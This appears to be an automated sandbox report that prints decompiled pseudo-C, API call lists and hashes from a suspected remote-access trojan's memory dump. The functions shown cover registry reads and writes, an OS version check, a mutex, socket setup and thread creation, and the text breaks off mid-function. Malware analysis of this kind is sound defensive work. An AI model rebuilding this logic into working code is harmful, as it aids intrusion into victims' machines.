                  • Part of subcall function 0041288E: RegCloseKey.KERNELBASE(?), ref: 004128DA
                • StrToIntA.SHLWAPI(00000000,0046A9AC,00000000,00000000,00000000,00473298,00000003,Exe,00000000,0000000E,00000000,0046408C,00000003,00000000), ref: 00419E97
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCurrentOpenProcessQueryValue
                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$P9G$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                • API String ID: 1866151309-2787534724
                • Opcode ID: 84b1c4753be20ea6fcc25a739c086d543e31789d1c034ba7582dc327abde189c
                • Instruction ID: 2d8a69e0546d05ecafa38ff55f4d44f4812dfb7c18b39c611b81bdfdf30cbcec
                • Opcode Fuzzy Hash: 84b1c4753be20ea6fcc25a739c086d543e31789d1c034ba7582dc327abde189c
                • Instruction Fuzzy Hash: C311E370A4020116C704B3659C5BEEF7A1D8790305F64053FF906B61D2EB7C1C9686AF
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1190 412a57-412a6e RegCreateKeyA 1191 412a70-412aa5 call 40245c call 401f8b RegSetValueExA RegCloseKey 1190->1191 1192 412aa7 1190->1192 1194 412aa9-412ab7 call 401fb8 1191->1194 1192->1194
                C-Code - Quality: 77%
                			E00412A57(void* __ecx, char* __edx, char* _a4, char _a8, int _a32) {
                				void* _v8;
                				long _t12;
                				int _t15;
                				long _t17;
                				signed int _t19;
                				signed int _t20;
                
                				_push(__ecx);
                				_push(_t19);
                				_t12 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
                				if(_t12 != 0) {
                					_t20 = 0;
                				} else {
                					_t15 = E0040245C();
                					_t17 = RegSetValueExA(_v8, _a4, 0, _a32, E00401F8B( &_a8), _t15); // executed
                					RegCloseKey(_v8); // executed
                					_t20 = _t19 & 0xffffff00 | _t17 == 0x00000000;
                				}
                				E00401FB8();
                				return _t20;
                			}










                APIs
                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412A66
                • RegSetValueExA.KERNELBASE(?,00465480,00000000,?,00000000,00000000,00473238,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A8E
                • RegCloseKey.KERNELBASE(?,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A99
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateValue
                • String ID: pth_unenc
                • API String ID: 1818849710-4028850238
                • Opcode ID: 94021dc1c1d03cfd80497e16010bebe54771d725e16ad2690a32dfc7f40571c1
                • Instruction ID: 065d1f4c68480eb08966ef6070b87cad1f8bbd79d217faba3f808efe567dd641
                • Opcode Fuzzy Hash: 94021dc1c1d03cfd80497e16010bebe54771d725e16ad2690a32dfc7f40571c1
                • Instruction Fuzzy Hash: 99F0F632140208BFCB00AFA0ED45DEE376CEF04750F104276BD09A61A2D7359E10DB94
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1200 412b5f-412b75 RegCreateKeyA 1201 412ba1 1200->1201 1202 412b77-412b9f RegSetValueExA RegCloseKey 1200->1202 1203 412ba3-412ba6 1201->1203 1202->1203
                C-Code - Quality: 100%
                			E00412B5F(void* __ecx, char* __edx, char* _a4, char _a8) {
                				void* _v8;
                				long _t9;
                				long _t12;
                
                				_t1 =  &_v8; // 0x464074
                				_t9 = RegCreateKeyA(0x80000001, __edx, _t1); // executed
                				if(_t9 != 0) {
                					return 0;
                				}
                				_t4 =  &_v8; // 0x464074, executed
                				_t12 = RegSetValueExA( *_t4, _a4, 0, 4,  &_a8, 4); // executed
                				return RegCloseKey(_v8) & 0xffffff00 | _t12 == 0x00000000;
                			}







                APIs
                • RegCreateKeyA.ADVAPI32(80000001,00000000,t@F), ref: 00412B6D
                • RegSetValueExA.KERNELBASE(t@F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B6CC,00464C08,00000001,000000AF,00464074), ref: 00412B88
                • RegCloseKey.ADVAPI32(?,?,?,?,0040B6CC,00464C08,00000001,000000AF,00464074), ref: 00412B93
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateValue
                • String ID: t@F
                • API String ID: 1818849710-3279925822
                • Opcode ID: 61de9578f52ee8f0e092330830a64b9a8e5eb202a0654fe1bc12343b251ebfa2
                • Instruction ID: f68fcc0987728696b45baa029fbd8ba208f586d8d4f13f853052a764fd9765f2
                • Opcode Fuzzy Hash: 61de9578f52ee8f0e092330830a64b9a8e5eb202a0654fe1bc12343b251ebfa2
                • Instruction Fuzzy Hash: 13E06D72544308FFDF109FA0ED05FEA7BACEB04BA1F1040A5BF09E6191D2759E14A7A8
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 90%
                			E0040949A(void* __ebx, void* __edi, void* __eflags, char _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
                				char _v28;
                				char _v52;
                				char _v76;
                				void* __esi;
                				void* __ebp;
                				void* _t24;
                				void* _t25;
                				void* _t36;
                				void* _t72;
                				void* _t75;
                				void* _t76;
                				void* _t77;
                
                				_t47 = __ebx;
                				_t77 = _t76 - 0x4c;
                				 *0x46f9d4 = _a4;
                				_push(_t72);
                				E00401F66(__ebx,  &_v28);
                				_t24 = E0043A3D6(_a12);
                				_t69 = _a8;
                				if(_t24 != 0) {
                					_t25 = E0040CF38( &_v52, _t69, _a12); // executed
                					E00401EF3(0x4730b8, _t69, 0x4730b8, _t25);
                					E00401EE9();
                					_t69 = E004087F0( &_v76, 0x4730b8, _t75, "\\");
                					E00401EF3( &_v28, _t28, 0x4730b8, E00402FF4(__ebx,  &_v52, _t28, __edi, _t75, __eflags, _a16));
                					E00401EE9();
                				} else {
                					E00401EF3( &_v28, _t69, _t72, E0040CF38( &_v52, _t69, _a16));
                				}
                				E00401EE9();
                				 *0x4730ec =  *0x4730ec & 0x00000000;
                				 *0x4730e8 = _a20 * 0x3e8;
                				 *0x47308b = _a24;
                				_t36 =  *0x46f9d4 - 0x31;
                				if(_t36 == 0) {
                					E004086D0(_t47, _t77 - 0x18, _t69, __eflags,  &_v28);
                					E0040977E(0x473040, _t69);
                				} else {
                					_t83 = _t36 == 1;
                					if(_t36 == 1) {
                						E004086D0(_t47, _t77 - 0x18, _t69, _t83,  &_v28);
                						E00409835(0x473040);
                					}
                				}
                				return E00401EE9();
                			}
















                APIs
                • _wcslen.LIBCMT ref: 004094B4
                  • Part of subcall function 0040977E: CreateThread.KERNEL32 ref: 00409806
                  • Part of subcall function 0040977E: CreateThread.KERNEL32 ref: 00409816
                  • Part of subcall function 0040977E: CreateThread.KERNEL32 ref: 00409822
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread$_wcslen
                • String ID: @0G$@0G
                • API String ID: 1119755333-1610251930
                • Opcode ID: 268728ee2d6dba40f4f33c5f53b121d98ffa03439a0f2b2e373874df87bffea9
                • Instruction ID: 8240ad2e3e1aaba782ca1c27cc07c235db1714dcc0b5eaf1d0f18af9b8f17ace
                • Opcode Fuzzy Hash: 268728ee2d6dba40f4f33c5f53b121d98ffa03439a0f2b2e373874df87bffea9
                • Instruction Fuzzy Hash: 81216171914149AACB05FFA6EC528EE7B78AE11304F00403FF805721E7DE385A59D7DA
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1245 40c577-40c5a3 call 401f8b CreateMutexA GetLastError
                C-Code - Quality: 100%
                			E0040C577() {
                				void* _t4;
                
                				_t4 = CreateMutexA(0, 1, E00401F8B(0x473268)); // executed
                				 *0x470d44 = _t4;
                				return 0 | GetLastError() != 0x000000b7;
                			}





                APIs
                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040E146,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046408C,00000003,00000000), ref: 0040C586
                • GetLastError.KERNEL32 ref: 0040C591
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CreateErrorLastMutex
                • String ID: h2G
                • API String ID: 1925916568-3159213000
                • Opcode ID: 4bc70ddb443fc9c159d84246c0f6c07cfd46d333705cf816a3e212b6fca9faca
                • Instruction ID: e6373a13d656ff6d6707b7a2cb114a9c32d4b8c21df5bc8e6e0dabda27f4a646
                • Opcode Fuzzy Hash: 4bc70ddb443fc9c159d84246c0f6c07cfd46d333705cf816a3e212b6fca9faca
                • Instruction Fuzzy Hash: 1CD01270709301DBD7141B74AC5976C35609B44703F0044B9F50BD55D1DB788480951A
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1248 41288e-4128ba RegOpenKeyExA 1249 4128bc-4128e4 RegQueryValueExA RegCloseKey 1248->1249 1250 4128ef 1248->1250 1251 4128f1 1249->1251 1252 4128e6-4128ed 1249->1252 1250->1251 1253 4128f6-412902 call 402073 1251->1253 1252->1253
                C-Code - Quality: 84%
                			E0041288E(void* __ecx, void* __edx, char* _a4, char* _a8) {
                				void* _v8;
                				int _v12;
                				char _v1036;
                				void* __ebp;
                				long _t11;
                				long _t16;
                				void* _t19;
                				void* _t21;
                				void* _t23;
                				void* _t26;
                
                				_t22 = __edx;
                				_v12 = 0x400;
                				_t23 = __ecx;
                				_t11 = RegOpenKeyExA(__edx, _a4, 0, 0x20019,  &_v8); // executed
                				if(_t11 != 0) {
                					_t21 = _t23;
                					goto L4;
                				} else {
                					_t16 = RegQueryValueExA(_v8, _a8, 0, 0,  &_v1036,  &_v12); // executed
                					RegCloseKey(_v8); // executed
                					_t21 = _t23;
                					if(_t16 != 0) {
                						L4:
                						_push(0x464074);
                					} else {
                						_push( &_v1036);
                					}
                				}
                				E00402073(_t19, _t21, _t22, _t26);
                				return _t23;
                			}














                APIs
                • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004128B2
                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004128CF
                • RegCloseKey.KERNELBASE(?), ref: 004128DA
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID:
                • API String ID: 3677997916-0
                • Opcode ID: 828b1612e10127a61cfb506c01d251519174206b74f7c168bb24ef52ea09b40d
                • Instruction ID: fa08edaff8def4b33d2b8c01463c49d1e7a9fcd5e8e464c1f7b2d0f15f6578c3
                • Opcode Fuzzy Hash: 828b1612e10127a61cfb506c01d251519174206b74f7c168bb24ef52ea09b40d
                • Instruction Fuzzy Hash: 0701DB76A00228BBDB205B95DD08DDF7FBDEB44751F004166BF04E2140D6748E55D7A4
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1256 412831-412859 RegOpenKeyExA 1257 412888 1256->1257 1258 41285b-412886 RegQueryValueExA RegCloseKey 1256->1258 1259 41288a-41288d 1257->1259 1258->1259
                C-Code - Quality: 100%
                			E00412831(char* __edx, char* _a4, char* _a8) {
                				void* _v8;
                				int _v12;
                				int _v16;
                				int _t12;
                				long _t14;
                				long _t18;
                				signed int _t19;
                
                				_t12 = 4;
                				_v12 = _t12;
                				_v16 = _t12;
                				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
                				if(_t14 != 0) {
                					return 0;
                				}
                				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12); // executed
                				_t19 = RegCloseKey(_v8); // executed
                				return _t19 & 0xffffff00 | _t18 == 0x00000000;
                			}











                APIs
                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00412851
                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00473238), ref: 0041286F
                • RegCloseKey.KERNELBASE(?), ref: 0041287A
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID:
                • API String ID: 3677997916-0
                • Opcode ID: 512b3eed686be6b2a2b717d5ef0a3d80ed66878d695c99a4db23412f4a9e56d0
                • Instruction ID: 69e43ff86f888a52894dd2156315322568ee34e4473ddb17d5254d30eae93871
                • Opcode Fuzzy Hash: 512b3eed686be6b2a2b717d5ef0a3d80ed66878d695c99a4db23412f4a9e56d0
                • Instruction Fuzzy Hash: 38F06D7294020CBFDF109FA0AD05FEEBBBCEB04B11F1041A1FA04E6191D2748A549B94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0044DC5D(void* __ecx) {
                				void* _t6;
                				void* _t14;
                				void* _t18;
                				WCHAR* _t19;
                
                				_t14 = __ecx;
                				_t19 = GetEnvironmentStringsW();
                				if(_t19 != 0) {
                					_t12 = (E0044DBA3(_t19) - _t19 >> 1) + (E0044DBA3(_t19) - _t19 >> 1);
                					_t6 = E00444A38(_t14, (E0044DBA3(_t19) - _t19 >> 1) + (E0044DBA3(_t19) - _t19 >> 1)); // executed
                					_t18 = _t6;
                					if(_t18 != 0) {
                						E004351E0(_t18, _t19, _t12);
                					}
                					E00445002(0);
                					FreeEnvironmentStringsW(_t19);
                				} else {
                					_t18 = 0;
                				}
                				return _t18;
                			}








                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 0044DC61
                • _free.LIBCMT ref: 0044DC9A
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044DCA1
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: EnvironmentStrings$Free_free
                • String ID:
                • API String ID: 2716640707-0
                • Opcode ID: e849e70284f1b11de74d388bff7e1643b43188b58a6ab48f4f5b44a644565459
                • Instruction ID: ad86e6e1ddca97a4082ae09d5a587ea03e6d4441ea4a4b9225e9d0609d6c243f
                • Opcode Fuzzy Hash: e849e70284f1b11de74d388bff7e1643b43188b58a6ab48f4f5b44a644565459
                • Instruction Fuzzy Hash: 33E09B77945E112BB622372ABC85E6F3658CFC27B6716012BF40496342EE589D0281FD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004127E7(void* __ecx, char* __edx, char* _a4) {
                				void* _v8;
                				long _t8;
                				signed int _t9;
                				long _t10;
                				signed int _t11;
                
                				_t8 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
                				if(_t8 != 0) {
                					_t9 = 0;
                				} else {
                					_t10 = RegQueryValueExA(_v8, _a4, 0, 0, 0, 0); // executed
                					_t11 = RegCloseKey(_v8); // executed
                					_t9 = _t11 & 0xffffff00 | _t10 == 0x00000000;
                				}
                				return _t9;
                			}









                APIs
                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B716,00464C08), ref: 004127FE
                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B716,00464C08), ref: 00412812
                • RegCloseKey.KERNELBASE(?,?,?,0040B716,00464C08), ref: 0041281D
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID:
                • API String ID: 3677997916-0
                • Opcode ID: e324eca442c7ad9a6d0e8b8ac30f941762bccad947d2c0f2533ecc126fcf5853
                • Instruction ID: 84763f97e707706bd7246b5a08c576b286280a2d5f648d27a36c848fc85b91b7
                • Opcode Fuzzy Hash: e324eca442c7ad9a6d0e8b8ac30f941762bccad947d2c0f2533ecc126fcf5853
                • Instruction Fuzzy Hash: 9CE06531905338BB9B205BA2AD0DDEB7FACDF06BA1B010165BD09A1151D2658E50E6E4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E00444A38(void* __ecx, long _a4) {
                				void* __esi;
                				void* _t4;
                				void* _t6;
                				void* _t7;
                				long _t8;
                
                				_t7 = __ecx;
                				_t8 = _a4;
                				if(_t8 > 0xffffffe0) {
                					L7:
                					 *((intOrPtr*)(E0043EEAD())) = 0xc;
                					__eflags = 0;
                					return 0;
                				}
                				if(_t8 == 0) {
                					_t8 = _t8 + 1;
                				}
                				while(1) {
                					_t4 = RtlAllocateHeap( *0x470a5c, 0, _t8); // executed
                					if(_t4 != 0) {
                						break;
                					}
                					__eflags = E00443E46();
                					if(__eflags == 0) {
                						goto L7;
                					}
                					_t6 = E00441850(_t7, _t8, __eflags, _t8);
                					_pop(_t7);
                					__eflags = _t6;
                					if(_t6 == 0) {
                						goto L7;
                					}
                				}
                				return _t4;
                			}









                APIs
                • RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID: P@
                • API String ID: 1279760036-676759640
                • Opcode ID: 9797f3068208b50acbf799f5f92ac938ca8f5a32afd615d80b0c57cacc916379
                • Instruction ID: fd7924e8b65afa23adb338f609f8de03ed02b176ca6f4a568383a370c07dd500
                • Opcode Fuzzy Hash: 9797f3068208b50acbf799f5f92ac938ca8f5a32afd615d80b0c57cacc916379
                • Instruction Fuzzy Hash: 69E0ED31581220AAF7307A669C05B6B3A8C9BD17B1F195027AC19B2AD4CB28CD0082ED
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E00444A86(void* __ecx, void* _a4, long _a8) {
                				void* __esi;
                				void* _t4;
                				long _t7;
                				void* _t13;
                				long _t15;
                
                				_t10 = __ecx;
                				_t13 = _a4;
                				if(_t13 != 0) {
                					_t15 = _a8;
                					__eflags = _t15;
                					if(_t15 != 0) {
                						__eflags = _t15 - 0xffffffe0;
                						if(_t15 <= 0xffffffe0) {
                							while(1) {
                								_t4 = RtlReAllocateHeap( *0x470a5c, 0, _t13, _t15); // executed
                								__eflags = _t4;
                								if(_t4 != 0) {
                									break;
                								}
                								__eflags = E00443E46();
                								if(__eflags == 0) {
                									goto L5;
                								}
                								_t7 = E00441850(_t10, _t15, __eflags, _t15);
                								_pop(_t10);
                								__eflags = _t7;
                								if(_t7 == 0) {
                									goto L5;
                								}
                							}
                							L7:
                							return _t4;
                						}
                						L5:
                						 *((intOrPtr*)(E0043EEAD())) = 0xc;
                						L6:
                						_t4 = 0;
                						__eflags = 0;
                						goto L7;
                					}
                					E00445002(_t13);
                					goto L6;
                				}
                				return E00444A38(__ecx, _a8);
                			}









                APIs
                • _free.LIBCMT ref: 00444AA7
                  • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,0043180D,00000000,0000000F,0042E217,?,?,004302BE,?,?,00000000), ref: 00444AE3
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap$_free
                • String ID:
                • API String ID: 1482568997-0
                • Opcode ID: 4b96d1d03d127e41e3fc58a79c3927ff31fe86e0064b2259c09856af757f84b3
                • Instruction ID: 455c427813147b6f3d2efebb8123bf363e795c38cc092496033f2fe0a3bdb231
                • Opcode Fuzzy Hash: 4b96d1d03d127e41e3fc58a79c3927ff31fe86e0064b2259c09856af757f84b3
                • Instruction Fuzzy Hash: 76F0F632281215AAFB216A66AC01F6B379D9FC1B74F24412FF914B62D1DF2CCC0041AD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E0040480D(char* __ecx) {
                				intOrPtr _t14;
                				char _t16;
                				char* _t22;
                
                				_t22 = __ecx;
                				if( *0x470abb != 0 || E0040487E() != 0) {
                					_t14 =  *0x470adc; // 0x140f348
                					__imp__#23( *((intOrPtr*)(_t14 + 4)), 1, 6); // executed
                					 *((intOrPtr*)(_t22 + 4)) = _t14;
                					if(_t14 == 0xffffffff) {
                						goto L2;
                					} else {
                						_t16 =  *0x470ae4; // 0x1
                						 *((char*)(_t22 + 0x5c)) = 0;
                						 *((intOrPtr*)(_t22 + 0x60)) = 0;
                						 *((intOrPtr*)(_t22 + 0x58)) = 0x3e8;
                						 *((char*)(_t22 + 0x7d)) = 0;
                						 *((char*)(_t22 + 1)) = _t16;
                						 *((intOrPtr*)(_t22 + 0x4c)) = 0;
                						 *((intOrPtr*)(_t22 + 0x50)) = 0;
                						 *((intOrPtr*)(_t22 + 0x68)) = 0;
                						 *((intOrPtr*)(_t22 + 0x70)) = 0;
                						 *((intOrPtr*)(_t22 + 0x6c)) = 0;
                						 *((intOrPtr*)(_t22 + 0x68)) = CreateEventW(0, 0, 1, 0);
                						 *_t22 = 1;
                						return 1;
                					}
                				} else {
                					L2:
                					return 0;
                				}
                			}







                APIs
                • socket.WS2_32(?,00000001,00000006), ref: 00404832
                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,004052EB,?,?,00000000,00000000,?,?,00000000,004051E8,?,00000000), ref: 0040486E
                  • Part of subcall function 0040487E: WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CreateEventStartupsocket
                • String ID:
                • API String ID: 1953588214-0
                • Opcode ID: ffe2297606e416d6c3b5ccad3e5f88dc31d939aa0b0f85ed0b7fe91bade190d6
                • Instruction ID: 59a91cd762d8530cb4f753689cd2647fba7b16dd7f4d7e7b9f20fabe365cb730
                • Opcode Fuzzy Hash: ffe2297606e416d6c3b5ccad3e5f88dc31d939aa0b0f85ed0b7fe91bade190d6
                • Instruction Fuzzy Hash: 200171B14087809FD7359F39B845697BFE0AB15304F048D6EF1DA97B91D3B1A481CB58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E0044205C(void* __ebx, void* __ecx) {
                				void* _t2;
                				intOrPtr _t3;
                				signed int _t15;
                				signed int _t16;
                
                				if( *0x4704e0 == 0) {
                					_push(_t15);
                					E0044D8D9(__ecx); // executed
                					_t2 = E0044DBDA(); // executed
                					_t19 = _t2;
                					if(_t2 != 0) {
                						_t3 = E00442109(__ebx, _t19);
                						if(_t3 != 0) {
                							 *0x4704ec = _t3;
                							E00442471(0x4704e0, _t3);
                							_t16 = 0;
                						} else {
                							_t16 = _t15 | 0xffffffff;
                						}
                						E00445002(0);
                					} else {
                						_t16 = _t15 | 0xffffffff;
                					}
                					E00445002(_t19);
                					return _t16;
                				} else {
                					return 0;
                				}
                			}








                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: 28729854537139cf2ef588ebbf1e600906cd533a01d3acd7e3f75a6007daa64c
                • Instruction ID: b81e25f7d5918c7bd40ad8093da2d01db50d861b45bde7110f025ab76158fc47
                • Opcode Fuzzy Hash: 28729854537139cf2ef588ebbf1e600906cd533a01d3acd7e3f75a6007daa64c
                • Instruction Fuzzy Hash: F7E0A02660282155B631723BBE0AA6F01858BC173DF91422BFA24861C2DFAC4882819D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E0040163E(signed int _a4, signed int _a8, char _a12) {
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _v40;
                				signed int _v44;
                				signed int _v48;
                				signed int _v52;
                				signed int _v56;
                				void* __esi;
                				signed int _t64;
                				signed int _t65;
                				signed int _t67;
                				signed int _t76;
                				signed int _t87;
                				signed int _t90;
                				signed int _t91;
                				signed int _t92;
                				intOrPtr _t93;
                				signed int _t94;
                				signed int _t96;
                				intOrPtr _t97;
                				intOrPtr _t103;
                				intOrPtr* _t105;
                				intOrPtr* _t107;
                				signed int _t108;
                				signed int _t109;
                				signed int _t111;
                				signed int _t123;
                				intOrPtr* _t125;
                				signed int _t130;
                				signed int _t132;
                				signed int _t133;
                				void* _t134;
                				void* _t140;
                				void* _t141;
                				void* _t144;
                				void* _t145;
                
                				_t108 = _a4;
                				if(_t108 != 0) {
                					_t65 = _t64 | 0xffffffff;
                					_t123 = _t65 % _a8;
                					__eflags = _t65 / _a8 - _t108;
                					if(_t65 / _a8 >= _t108) {
                						_t109 = _t108 * _a8;
                						__eflags = _a12;
                						if(__eflags == 0) {
                							L8:
                							_t67 = E00432DF5(_t123, _t134, __eflags, _t109); // executed
                							_t111 = _t67;
                							goto L9;
                						} else {
                							__eflags = _t109 - 0x1000;
                							if(__eflags < 0) {
                								goto L8;
                							} else {
                								_t69 = _t109 + 0x23;
                								__eflags = _t109 + 0x23 - _t109;
                								if(__eflags <= 0) {
                									goto L3;
                								} else {
                									_t97 = E00432DF5(_t123, _t134, __eflags, _t69);
                									_t11 = _t97 + 0x23; // 0x23
                									_t111 = _t11 & 0xffffffe0;
                									 *((intOrPtr*)(_t111 - 4)) = _t97;
                									L9:
                									return _t111;
                								}
                							}
                						}
                					} else {
                						L3:
                						_t140 = _t144;
                						_t145 = _t144 - 0xc;
                						E004334C8( &_v16);
                						E004379F6( &_v16,  &E0046C37C);
                						asm("int3");
                						_push(_t140);
                						_t141 = _t145;
                						E004334FB( &_v32);
                						E004379F6( &_v32,  &E0046C3B4);
                						asm("int3");
                						_push(_t141);
                						 *0x46fd1c =  *0x46fd1c & 0x00000000;
                						 *0x46f010 =  *0x46f010 | 1;
                						_t76 = IsProcessorFeaturePresent(0xa);
                						__eflags = _t76;
                						if(_t76 != 0) {
                							_v32 = _v32 & 0x00000000;
                							 *0x46f010 =  *0x46f010 | 0x00000002;
                							_push(_t134);
                							 *0x46fd1c = 1;
                							_t125 =  &_v56;
                							_push(1);
                							asm("cpuid");
                							_pop(_t103);
                							 *_t125 = 0;
                							 *((intOrPtr*)(_t125 + 4)) = 1;
                							 *((intOrPtr*)(_t125 + 8)) = 0;
                							 *(_t125 + 0xc) = _t123;
                							_v24 = _v56;
                							_v16 = _v44 ^ 0x49656e69;
                							_v20 = _v48 ^ 0x6c65746e;
                							_push(1);
                							asm("cpuid");
                							_t105 =  &_v56;
                							__eflags = _v52 ^ 0x756e6547 | _v16 | _v20;
                							 *_t105 = 1;
                							 *((intOrPtr*)(_t105 + 4)) = _t103;
                							 *((intOrPtr*)(_t105 + 8)) = 0;
                							 *(_t105 + 0xc) = _t123;
                							if((_v52 ^ 0x756e6547 | _v16 | _v20) != 0) {
                								L21:
                								_t130 =  *0x46fd20; // 0x2
                							} else {
                								_t96 = _v56 & 0x0fff3ff0;
                								__eflags = _t96 - 0x106c0;
                								if(_t96 == 0x106c0) {
                									L20:
                									_t133 =  *0x46fd20; // 0x2
                									_t130 = _t133 | 0x00000001;
                									 *0x46fd20 = _t130;
                								} else {
                									__eflags = _t96 - 0x20660;
                									if(_t96 == 0x20660) {
                										goto L20;
                									} else {
                										__eflags = _t96 - 0x20670;
                										if(_t96 == 0x20670) {
                											goto L20;
                										} else {
